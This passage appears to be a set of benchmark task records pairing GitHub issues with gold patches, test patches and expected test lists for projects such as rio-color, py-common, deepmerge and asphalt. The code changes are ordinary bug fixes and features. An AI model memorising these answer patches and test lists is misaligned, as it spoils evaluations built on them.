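The real `MergeSort` class in the patch additionally tracks memory use with `sys.getsizeof`, accepts a `key` function such as `functools.cmp_to_key(linecomp)`, and writes partitions in binary mode to avoid newline conversion on Windows.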
|
0.0
|
c5ba05b4db22a74388b0c2b863e1c4a9f0467c8b
|
[
"pgtricks/tests/test_mergesort.py::mypy",
"pgtricks/tests/test_mergesort.py::mypy-status",
"pgtricks/tests/test_mergesort.py::test_mergesort_append[\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_append[\\r\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_flush[\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_flush[\\r\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_iterate_disk[\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_iterate_disk[\\r\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_iterate_memory[\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_iterate_memory[\\r\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_key[\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_key[\\r\\n]",
"pgtricks/tests/test_pg_dump_splitsort.py::mypy",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[--expect0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[foo--expect1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[foo-bar-expect2]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0-1-expect3]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0-one-expect4]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0.0-0.0-expect5]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0.0-one",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0.-1.-expect7]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0.-one-expect8]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[4.2-0.42-expect9]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[4.2-four",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[-.42--0.042-expect11]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[-.42-minus",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[\\\\N-\\\\N-expect13]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[foo-\\\\N-expect14]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[-4.2-\\\\N-expect15]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[--0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[a-b--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[b-a-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[0-1--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[1-0-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[0--1-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[-1-0--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[0-0-0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[-1--1-0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[0.42-0.042-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[4.2-42.0--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[-.42-.42--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[.42--.42-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[\"32.0\"-\"4.20\"--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[foo\\ta-bar\\tb-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[foo\\tb-foo\\ta-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[foo\\t0.42-foo\\t4.2--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[foo\\tbar\\t0.42424242424242\\tbaz-foo\\tbar\\t0.42424242424242\\tbaz-0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[foo-0-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[0-foo--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[42--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[-42--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[42-42.0-0_0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[42-\\\\N--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[\\\\N-42-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[42-42.0-0_1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[-\\\\N--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[\\\\N--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[\\\\N-\\\\N-0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp_by_sorting",
"pgtricks/tests/test_pg_dump_splitsort.py::test_split_sql_file",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[0-0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1k-1024]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1m-1048576]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1g-1073741824]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[100_000K-102400000]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1.5M-1572864]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1.5G-1610612736]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1.5-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1.5",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1.5KB-1536]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[.5MB-524288]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[20GB-21474836480]"
] |
[] |
{
"failed_lite_validators": [
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-07-04 07:59:52+00:00
|
bsd-3-clause
| 987
|
|
mapbox__rio-color-14
|
diff --git a/rio_color/scripts/cli.py b/rio_color/scripts/cli.py
index 7ec9cab..9580f68 100755
--- a/rio_color/scripts/cli.py
+++ b/rio_color/scripts/cli.py
@@ -1,13 +1,27 @@
import click
+
import rasterio
from rio_color.workers import atmos_worker, color_worker
from rio_color.operations import parse_operations
import riomucho
+jobs_opt = click.option(
+ '--jobs', '-j', type=int, default=1,
+ help="Number of jobs to run simultaneously, Use -1 for all cores, default: 1")
+
+
+def check_jobs(jobs):
+ if jobs == 0:
+ raise click.UsageError("Jobs must be >= 1 or == -1")
+ elif jobs < 0:
+ import multiprocessing
+ jobs = multiprocessing.cpu_count()
+ return jobs
+
+
@click.command('color')
-@click.option('--jobs', '-j', type=int, default=1,
- help="Number of jobs to run simultaneously, default: 1")
+@jobs_opt
@click.option('--out-dtype', '-d', type=click.Choice(['uint8', 'uint16']),
help="Integer data type for output data, default: same as input")
@click.argument('src_path', type=click.Path(exists=True))
@@ -73,6 +87,8 @@ Example:
'out_dtype': out_dtype
}
+ jobs = check_jobs(jobs)
+
if jobs > 1:
with riomucho.RioMucho(
[src_path],
@@ -103,8 +119,7 @@ Example:
@click.option('--bias', '-b', type=click.FLOAT, default=15,
help="Skew (brighten/darken) the output. Lower values make it "
"brighter. 0..100 (50 is none), default: 15.")
-@click.option('--jobs', '-j', type=int, default=1,
- help="Number of jobs to run simultaneously, default: 1")
+@jobs_opt
@click.option('--out-dtype', '-d', type=click.Choice(['uint8', 'uint16']),
help="Integer data type for output data, default: same as input")
@click.argument('src_path', type=click.Path(exists=True))
@@ -132,6 +147,8 @@ def atmos(ctx, atmo, contrast, bias, jobs, out_dtype,
'out_dtype': out_dtype
}
+ jobs = check_jobs(jobs)
+
if jobs > 1:
with riomucho.RioMucho(
[src_path],
|
mapbox/rio-color
|
bb410109f6a0ae376443880f96dc8981766066a3
|
diff --git a/tests/test_cli.py b/tests/test_cli.py
index 8448a74..1d30644 100644
--- a/tests/test_cli.py
+++ b/tests/test_cli.py
@@ -1,10 +1,12 @@
import os
+from click import UsageError
from click.testing import CliRunner
import numpy as np
+import pytest
import rasterio
-from rio_color.scripts.cli import color, atmos
+from rio_color.scripts.cli import color, atmos, check_jobs
def equal(r1, r2):
@@ -98,3 +100,25 @@ def test_bad_op(tmpdir):
assert result.exit_code == 2
assert "foob is not a valid operation" in result.output
assert not os.path.exists(output)
+
+
+def test_color_jobsn1(tmpdir):
+ output = str(tmpdir.join('colorj1.tif'))
+ runner = CliRunner()
+ result = runner.invoke(
+ color,
+ [
+ '-d', 'uint8',
+ '-j', '-1',
+ 'tests/rgb8.tif',
+ output,
+ "gamma 1,2,3 1.85"])
+ assert result.exit_code == 0
+ assert os.path.exists(output)
+
+
+def test_check_jobs():
+ assert 1 == check_jobs(1)
+ assert check_jobs(-1) > 0
+ with pytest.raises(UsageError):
+ check_jobs(0)
|
use all cores with -j -1
Modify max_procs so that a negative value means "use the number of cores available on this machine"
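
The patch above implements this through a shared `--jobs`/`-j` option and a `check_jobs` helper. A short hedged sketch of the normalization it performs (mirroring the patch, shown standalone):

```python
import multiprocessing

import click


def check_jobs(jobs: int) -> int:
    """Normalize the --jobs value: any negative value means 'use all cores', 0 is invalid."""
    if jobs == 0:
        raise click.UsageError("Jobs must be >= 1 or == -1")
    if jobs < 0:
        return multiprocessing.cpu_count()
    return jobs


# check_jobs(1)  -> 1
# check_jobs(-1) -> number of CPUs on this machine
# check_jobs(0)  -> raises click.UsageError
```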
|
0.0
|
bb410109f6a0ae376443880f96dc8981766066a3
|
[
"tests/test_cli.py::test_check_jobs"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-04-18 20:15:46+00:00
|
mit
| 3,703
|
|
arxanchain__py-common-16
|
diff --git a/README.md b/README.md
index 8221932..40254e2 100644
--- a/README.md
+++ b/README.md
@@ -21,20 +21,50 @@ $ python setup.py install # install py-common
## Usage
-**Note:** Before using the py-common in your operating system, you need to make a two-step preparation:
+**Note:** Before using the py-common in your application, you need to make the following preparations:
-1. Build executables with sdk-go-common cryption tools. To build these tools, you may need to install **golang** package **sdk-go-common**. For more details please refer to [sdk-go-common](https://github.com/arxanchain/sdk-go-common/tree/master/crypto/tools/README.md)
+### 1.Configure your encryption and signing libraries
-2. Copy executables **crypto-util** and **sign-util** into your py-common installation path `cryption/utils`.
+1. Build executables with sdk-go-common encryption tools. To build these executables, you need to install **golang** and download **sdk-go-common**. For more details please refer to [sdk-go-common](https://github.com/arxanchain/sdk-go-common/tree/master/crypto/tools/README.md).
-If you have no idea where your py-common is installed, use the following command to check out.
+2. Copy the executables **crypto-util** and **sign-util** into your py-common installation path `cryption/utils`.
+
+If you have no idea where your py-common is installed, use the following command to check it out (you need to leave the py-common code repo before running this command).
```sh
$ python -c 'import imp;print imp.find_module("cryption")[1]'
/usr/local/lib/python2.7/site-packages/py_common-1.5.0-py2.7.egg/cryption
```
-In this case, you should copy executables into path `/usr/local/lib/python2.7/site-packages/py_common-1.5.0-py2.7.egg/cryption/utils/`.
+In this case, you should create directory `/usr/local/lib/python2.7/site-packages/py_common-1.5.0-py2.7.egg/cryption/utils/`, and copy the executables into this path.
+
+### 2. Configure you certificates
+
+To communicate with the server, you need to download a TLS certificate, register api-key and download the corresponding private key file from your ArxanChain BaaS Chainconsole. Refer to [API cert management](http://www.arxanfintech.com/infocenter/html/chainconsole/manual.html#api) for more details.
+
+After downloading the two files, use the following command to convert your private key file into PEM format.
+
+```sh
+$ openssl ec -in apikey.key -outform PEM -out apikey.key
+```
+
+Then copy (rename as follows) your TLS certificate and PEM private key file into your py-common installation path as follows. Please pay special attention to the absolute path of your certificate `./py_common-1.5.0-py2.7.egg/cryption/ecc/certs`, which will be used to create a wallet client.
+
+```
+.
+├── py_common-1.5.0-py2.7.egg
+| └── cryption
+| ├── ecc
+| | └── certs
+| | ├── tls
+| | | └── tls.cert
+| | └── users
+| | └── pWEzB4yMM1518346407
+| | └── pWEzB4yMM1518346407.key
+| └── utils
+| ├── sign-util
+| └── crypto-util
+```
### Run unit test
diff --git a/rest/api/api.py b/rest/api/api.py
index 775245b..6bdad9a 100644
--- a/rest/api/api.py
+++ b/rest/api/api.py
@@ -34,12 +34,15 @@ APIKEY = "pWEzB4yMM1518346407"
def set_body(body, apikey, cert_path):
"""Set body encdypted.
- :param body: body dictionary to be encrypted
+ :param body: body dictionary or string to be encrypted
:param apikey: api key generated from server
:param cert_path: path of private key file and cert file
:Returns: crypted cipher text
"""
- return sign_and_encrypt(json.dumps(body), apikey, cert_path)
+ if isinstance(body, dict):
+ body = json.dumps(body)
+
+ return sign_and_encrypt(body, apikey, cert_path)
def set_sign_body(body, secret_key, did, nonce, apikey, cert_path):
"""Set body signed.
@@ -69,7 +72,12 @@ def do_post(url, headers, body, files=None):
:param body: body dictionary
:Returns: response
"""
- return requests.post(url, headers=headers, data=body, files=files)
+ return requests.post(
+ url,
+ headers=headers,
+ data=body,
+ files=files
+ )
def do_put(url, headers, body):
"""Start POST request.
@@ -91,7 +99,9 @@ def require_ok(resp, apikey, cert_path):
"""
client_err_msg = ""
if resp.status_code != STATUS_CODE_OK:
- logging.error("Status code: {}, Client Error, body: {}".format(resp.status_code, resp.text))
+ logging.error("Status code: {}, Client Error, body: {}".format(
+ resp.status_code,
+ resp.text))
if len(resp.text) <= 0:
client_err_msg = "Respond error: Body empty"
@@ -101,11 +111,16 @@ def require_ok(resp, apikey, cert_path):
result = {}
plain_body = ""
try:
- plain_body = decrypt_and_verify(resp.text, apikey, cert_path)
+ plain_body = decrypt_and_verify(
+ resp.text,
+ apikey,
+ cert_path
+ )
result = json.loads(plain_body)
except Exception:
logging.error("cannot decrypt_and_verify response body: {}".format(resp.text))
client_err_msg = resp.text
+
result["ClientErrMsg"] = client_err_msg
return result
@@ -120,18 +135,49 @@ def do_request(req_params, apikey, cert_path, request_func):
:param request_func: request function to be used
:Returns: time duration, response
"""
+
if len(cert_path) <= 0:
cert_path = CERT_PATH
if len(apikey) <= 0:
apikey = APIKEY
beg_time = time.time()
+
if request_func == do_get and "body" in req_params:
del req_params["body"]
else:
- req_body = set_body(req_params["body"], apikey, cert_path)
+ req_body = set_body(
+ req_params["body"],
+ apikey,
+ cert_path
+ )
req_params["body"] = req_body
- resp = require_ok(request_func(**req_params),
+
+ resp = require_ok(
+ request_func(**req_params),
apikey, cert_path)
+
time_dur = time.time() - beg_time
return time_dur, resp
+
+def do_prepare(prepared, apikey, cert_path):
+ """ Do requst with the given request object.
+ And calculate total time used.
+
+ :param requests.PreparedRequest object used to do the request
+ :param apikey: the api key authorized by the server
+ :param cert_path: path of private key file and cert file
+ :Returns: time duration, response
+ """
+ prepared.body = set_body(prepared.body, apikey, cert_path)
+ prepared.headers['Content-Length'] = str(len(prepared.body))
+ beg_time = time.time()
+ resp = require_ok(
+ requests.session().send(prepared),
+ apikey,
+ cert_path
+ )
+ time_dur = time.time() - beg_time
+
+ return time_dur, resp
+
|
arxanchain/py-common
|
963a267c3aa42571f778c7fb5efa29c4f6aa09a3
|
diff --git a/test/test_api.py b/test/test_api.py
index 60eace4..57328fe 100644
--- a/test/test_api.py
+++ b/test/test_api.py
@@ -20,12 +20,13 @@ import json
import sys
import httpretty
import mock
+import requests
ROOTPATH = os.path.join(
os.path.dirname(__file__),
"../"
)
sys.path.append(ROOTPATH)
-from rest.api.api import set_body, set_sign_body, do_get, do_post, do_put, require_ok, do_request
+from rest.api.api import set_body, set_sign_body, do_get, do_post, do_put, require_ok, do_request, do_prepare
class Response(object):
def __init__(self, status_code, text):
@@ -38,6 +39,7 @@ class ApiTest(unittest.TestCase):
def setUp(self):
# Every test needs access to the request factory.
self.header = {}
+ self.url = "http://127.0.0.1"
self.status_not_found = 404
self.resp_not_found = "404 Not Found"
self.nonce = "nonce"
@@ -152,4 +154,53 @@ class ApiTest(unittest.TestCase):
)
self.assertEqual(self.resp_not_found, result["ClientErrMsg"])
-
+
+ def test_do_prepare_succ(self):
+ mock_send = mock.Mock(return_value=Response(self.status_ok, json.dumps(self.resp)))
+ mock_run_cmd = mock.Mock(side_effect=[self.cipher, json.dumps(self.resp)])
+ request_func = do_post
+ with mock.patch('cryption.crypto.run_cmd', mock_run_cmd):
+ with mock.patch('requests.Session.send', mock_send):
+ poeid_filepart = (
+ "",
+ "poe id",
+ )
+ files = {"poe_id": poeid_filepart}
+
+ _, result = do_prepare(
+ requests.Request(
+ "POST",
+ url=self.url,
+ files=files
+ ).prepare(),
+ self.apikey,
+ self.cert_path
+ )
+
+ self.assertEqual(0, result["ErrCode"])
+
+ def test_do_prepare_fail(self):
+ mock_send = mock.Mock(return_value=Response(self.status_not_found, self.resp_not_found))
+ mock_run_cmd = mock.Mock(side_effect=[self.cipher, {}])
+ with mock.patch('cryption.crypto.run_cmd', mock_run_cmd):
+ with mock.patch('requests.Session.send', mock_send):
+ poeid_filepart = (
+ "",
+ "poe id",
+ )
+ files = {
+ "poe_id": poeid_filepart,
+ }
+
+ _, result = do_prepare(
+ requests.Request(
+ "POST",
+ url=self.url,
+ files=files
+ ).prepare(),
+ self.apikey,
+ self.cert_path
+ )
+
+ self.assertEqual(self.resp_not_found, result["ClientErrMsg"])
+
|
README add certs tree description
```
| └── certs
| ├── tls
| | └── tls.cert
| └── users
| └── pWEzB4yMM1518346407
| └── pWEzB4yMM1518346407.key
```
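
The tree above describes where the TLS certificate and the API key's PEM private key are expected under the installed package. As a purely illustrative, hedged helper (not part of py-common; the `find_certs_dir`/`check_cert_layout` names are hypothetical and the example api key is taken from the README and `rest/api/api.py` above), one could verify that layout like this:

```python
import imp  # the README above locates the installed package with imp.find_module
import os


def find_certs_dir():
    """Locate cryption/ecc/certs inside the installed py-common package."""
    cryption_path = imp.find_module("cryption")[1]
    return os.path.join(cryption_path, "ecc", "certs")


def check_cert_layout(apikey="pWEzB4yMM1518346407"):
    """Map each expected certificate file from the tree above to whether it exists."""
    certs = find_certs_dir()
    expected = [
        os.path.join(certs, "tls", "tls.cert"),
        os.path.join(certs, "users", apikey, apikey + ".key"),
    ]
    return {path: os.path.exists(path) for path in expected}
```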
|
0.0
|
963a267c3aa42571f778c7fb5efa29c4f6aa09a3
|
[
"test/test_api.py::ApiTest::test_do_prepare_fail",
"test/test_api.py::ApiTest::test_do_prepare_succ"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2018-03-13 09:02:29+00:00
|
apache-2.0
| 1,101
|
|
toumorokoshi__deepmerge-22
|
diff --git a/Makefile b/Makefile
index 9a611ee..75ba49c 100644
--- a/Makefile
+++ b/Makefile
@@ -11,7 +11,7 @@ build: .venv/deps
# only works with python 3+
lint: .venv/deps
- .venv/bin/python -m pip install black==21.12b0
+ .venv/bin/python -m pip install black==22.3.0
.venv/bin/python -m black --check .
test: .venv/deps
diff --git a/deepmerge/extended_set.py b/deepmerge/extended_set.py
new file mode 100644
index 0000000..1d51b43
--- /dev/null
+++ b/deepmerge/extended_set.py
@@ -0,0 +1,25 @@
+class ExtendedSet(set):
+ """
+ ExtendedSet is an extension of set, which allows for usage
+ of types that are typically not allowed in a set
+ (e.g. unhashable).
+
+ The following types that cannot be used in a set are supported:
+
+ - unhashable types
+ """
+
+ def __init__(self, elements):
+ self._values_by_hash = {self._hash(e): e for e in elements}
+
+ def _insert(self, element):
+ self._values_by_hash[self._hash(element)] = element
+
+ def _hash(self, element):
+ if getattr(element, "__hash__") is not None:
+ return hash(element)
+ else:
+ return hash(str(element))
+
+ def __contains__(self, obj):
+ return self._hash(obj) in self._values_by_hash
diff --git a/deepmerge/strategy/list.py b/deepmerge/strategy/list.py
index ca42828..2e42519 100644
--- a/deepmerge/strategy/list.py
+++ b/deepmerge/strategy/list.py
@@ -1,4 +1,5 @@
from .core import StrategyList
+from ..extended_set import ExtendedSet
class ListStrategies(StrategyList):
@@ -26,5 +27,5 @@ class ListStrategies(StrategyList):
@staticmethod
def strategy_append_unique(config, path, base, nxt):
"""append items without duplicates in nxt to base."""
- base_as_set = set(base)
+ base_as_set = ExtendedSet(base)
return base + [n for n in nxt if n not in base_as_set]
diff --git a/docs/conf.py b/docs/conf.py
index ee1edbc..df0dc4d 100644
--- a/docs/conf.py
+++ b/docs/conf.py
@@ -52,18 +52,18 @@ source_suffix = ".rst"
master_doc = "index"
# General information about the project.
-project = u"deepmerge"
-copyright = u"2016, Yusuke Tsutsumi"
-author = u"Yusuke Tsutsumi"
+project = "deepmerge"
+copyright = "2016, Yusuke Tsutsumi"
+author = "Yusuke Tsutsumi"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
-version = u"0.1"
+version = "0.1"
# The full version, including alpha/beta/rc tags.
-release = u"0.1"
+release = "0.1"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
@@ -271,8 +271,8 @@ latex_documents = [
(
master_doc,
"deepmerge.tex",
- u"deepmerge Documentation",
- u"Yusuke Tsutsumi",
+ "deepmerge Documentation",
+ "Yusuke Tsutsumi",
"manual",
),
]
@@ -308,7 +308,7 @@ latex_documents = [
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
-man_pages = [(master_doc, "deepmerge", u"deepmerge Documentation", [author], 1)]
+man_pages = [(master_doc, "deepmerge", "deepmerge Documentation", [author], 1)]
# If true, show URL addresses after external links.
#
@@ -324,7 +324,7 @@ texinfo_documents = [
(
master_doc,
"deepmerge",
- u"deepmerge Documentation",
+ "deepmerge Documentation",
author,
"deepmerge",
"One line description of project.",
diff --git a/docs/guide.rst b/docs/guide.rst
index 39f414a..a13bb01 100644
--- a/docs/guide.rst
+++ b/docs/guide.rst
@@ -10,7 +10,7 @@ it's recommended to choose your own strategies, deepmerge does
provided some preconfigured mergers for a common situations:
* deepmerge.always_merger: always try to merge. in the case of mismatches, the value from the second object overrides the first o ne.
-* deepmerge.merge_or_raise: try to merge, raise an exception if an unmergable situation is encountered.
+* deepmerge.merge_or_raise: try to merge, raise an exception if an unmergable situation is encountered.
* deepmerge.conservative_merger: similar to always_merger, but in the case of a conflict, use the existing value.
Once a merger is constructed, it then has a merge() method that can be called:
@@ -33,7 +33,6 @@ Once a merger is constructed, it then has a merge() method that can be called:
Merges are Destructive
======================
-
You may have noticed from the example, but merging is a destructive behavior: it will modify the first argument passed in (the base) as part of the merge.
This is intentional, as an implicit copy would result in a significant performance slowdown for deep data structures. If you need to keep the original objects unmodified, you can use the deepcopy method:
@@ -96,3 +95,13 @@ Example:
If a strategy fails, an exception should not be raised. This is to
ensure it can be chained with other strategies, or the fall-back.
+Uniqueness of elements when merging
+===================================
+
+Some strategies require determining the uniqueness
+of the elements. Since deepmerge primarily deals with nested
+types, this includes structures that are not hashable such as
+dictionaries.
+
+In those cases, built-in deepmerge strategies will call repr()
+on the object and hash that value instead.
\ No newline at end of file
|
toumorokoshi/deepmerge
|
4ac5ff666d06cb072ff200ff4255d86d950b71a4
|
diff --git a/deepmerge/tests/strategy/test_list.py b/deepmerge/tests/strategy/test_list.py
index 39215a9..7eb2d3b 100644
--- a/deepmerge/tests/strategy/test_list.py
+++ b/deepmerge/tests/strategy/test_list.py
@@ -19,3 +19,15 @@ def test_strategy_append_unique(custom_merger):
expected = [1, 3, 2, 5, 4]
actual = custom_merger.merge(base, nxt)
assert actual == expected
+
+
+def test_strategy_append_unique_nested_dict(custom_merger):
+ """append_unique should work even with unhashable objects
+ Like dicts.
+ """
+ base = [{"bar": ["bob"]}]
+ nxt = [{"bar": ["baz"]}]
+
+ result = custom_merger.merge(base, nxt)
+
+ assert result == [{"bar": ["bob"]}, {"bar": ["baz"]}]
|
list merge strategy append_unique does not work for lists of dicts
Hi developers, especially @morph027,
I get an error when trying to apply the list merge strategy `append_unique` to lists of dictionaries.
I am using deepmerge 1.0.1 and python 3.7.7.
When I am running the following code
```python
from deepmerge import Merger
my_merger = Merger(
# pass in a list of tuple, with the
# strategies you are looking to apply
# to each type.
[
(list, ["append_unique"]),
(dict, ["merge"]),
(set, ["union"])
],
# next, choose the fallback strategies,
# applied to all other types:
["override"],
# finally, choose the strategies in
# the case where the types conflict:
["override"]
)
base = {"foo": ["bar"]}
next = {"foo": ["bar","baz"]}
result = my_merger.merge(base, next)
assert result == {'foo': ['bar', 'baz']}
base = {"foo": [{"bar": ["bob"]}]}
next = {"foo": [{"bar": ["baz"]}]}
result = my_merger.merge(base, next)
assert result == {'foo': [{'bar', ["bob"]}, {"bar": ["baz"]}]}
```
I get the following exception
```bash
python3 test_merge.py
Traceback (most recent call last):
File "test_merge.py", line 29, in <module>
result = my_merger.merge(base, next)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/merger.py", line 33, in merge
return self.value_strategy([], base, nxt)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/merger.py", line 43, in value_strategy
return strategy(self, path, base, nxt)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/strategy/core.py", line 35, in __call__
ret_val = s(*args, **kwargs)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/strategy/dict.py", line 23, in strategy_merge
base[k] = config.value_strategy(path + [k], base[k], v)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/merger.py", line 43, in value_strategy
return strategy(self, path, base, nxt)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/strategy/core.py", line 35, in __call__
ret_val = s(*args, **kwargs)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/strategy/list.py", line 29, in strategy_append_unique
base_as_set = set(base)
TypeError: unhashable type: 'dict'
```
Best,
Oliver
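
The fix merged for this issue (the `ExtendedSet` class in the patch above) side-steps the `TypeError` by hashing the string form of unhashable elements. A minimal hedged sketch of that membership check, separate from the released class:

```python
def _hashable(value):
    """Use the value itself when it is hashable, otherwise fall back to its str() form."""
    return value if value.__hash__ is not None else str(value)


def append_unique(base, nxt):
    """Append items from nxt that are not already in base, even when items are unhashable."""
    seen = {_hashable(item) for item in base}
    return base + [item for item in nxt if _hashable(item) not in seen]


# append_unique([{"bar": ["bob"]}], [{"bar": ["baz"]}, {"bar": ["bob"]}])
# -> [{"bar": ["bob"]}, {"bar": ["baz"]}]
```

As with the released strategy, two distinct objects that happen to share the same string form would be treated as duplicates; the documentation change in the patch above calls out that trade-off.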
|
0.0
|
4ac5ff666d06cb072ff200ff4255d86d950b71a4
|
[
"deepmerge/tests/strategy/test_list.py::test_strategy_append_unique_nested_dict"
] |
[
"deepmerge/tests/strategy/test_list.py::test_strategy_append_unique"
] |
{
"failed_lite_validators": [
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-10-21 06:00:20+00:00
|
mit
| 6,067
|
|
asphalt-framework__asphalt-50
|
diff --git a/docs/userguide/deployment.rst b/docs/userguide/deployment.rst
index 6736615..7f9fd45 100644
--- a/docs/userguide/deployment.rst
+++ b/docs/userguide/deployment.rst
@@ -17,17 +17,18 @@ Running the launcher is very straightfoward:
.. code-block:: bash
- asphalt run yourconfig.yaml [your-overrides.yml...]
+ asphalt run yourconfig.yaml [your-overrides.yml...] [--set path.to.key=val]
Or alternatively:
- python -m asphalt run yourconfig.yaml [your-overrides.yml...]
+ python -m asphalt run yourconfig.yaml [your-overrides.yml...] [--set path.to.key=val]
What this will do is:
#. read all the given configuration files, starting from ``yourconfig.yaml``
-#. merge the configuration files' contents into a single configuration dictionary using
- :func:`~asphalt.core.utils.merge_config`
+#. read the command line configuration options passed with ``--set``, if any
+#. merge the configuration files' contents and the command line configuration options into a single configuration dictionary using
+ :func:`~asphalt.core.utils.merge_config`.
#. call :func:`~asphalt.core.runner.run_application` using the configuration dictionary as keyword
arguments
@@ -147,8 +148,10 @@ Component configuration can be specified on several levels:
* First configuration file argument to ``asphalt run``
* Second configuration file argument to ``asphalt run``
* ...
+* Command line configuration options to ``asphalt run --set``
Any options you specify on each level override or augment any options given on previous levels.
+The command line configuration options have precedence over the configuration files.
To minimize the effort required to build a working configuration file for your application, it is
suggested that you pass as many of the options directly in the component initialization code and
leave only deployment specific options like API keys, access credentials and such to the
@@ -162,12 +165,29 @@ gets passed three keyword arguments:
* ``ssl=True``
The first one is provided in the root component code while the other two options come from the YAML
-file. You could also override the mailer backend in the configuration file if you wanted. The same
-effect can be achieved programmatically by supplying the override configuration to the container
-component via its ``components`` constructor argument. This is very useful when writing tests
-against your application. For example, you might want to use the ``mock`` mailer in your test suite
-configuration to test that the application correctly sends out emails (and to prevent them from
-actually being sent to recipients!).
+file. You could also override the mailer backend in the configuration file if you wanted, or at the
+command line (with the configuration file saved as ``config.yaml``):
+
+.. code-block:: bash
+
+ asphalt run config.yaml --set component.components.mailer.backend=sendmail
+
+.. note::
+ Note that if you want a ``.`` to be treated as part of an identifier, and not as a separator,
+ you need to escape it at the command line with ``\``. For instance, in both commands:
+
+ .. code-block:: bash
+
+ asphalt run config.yaml --set "logging.loggers.asphalt\.templating.level=DEBUG"
+ asphalt run config.yaml --set logging.loggers.asphalt\\.templating.level=DEBUG
+
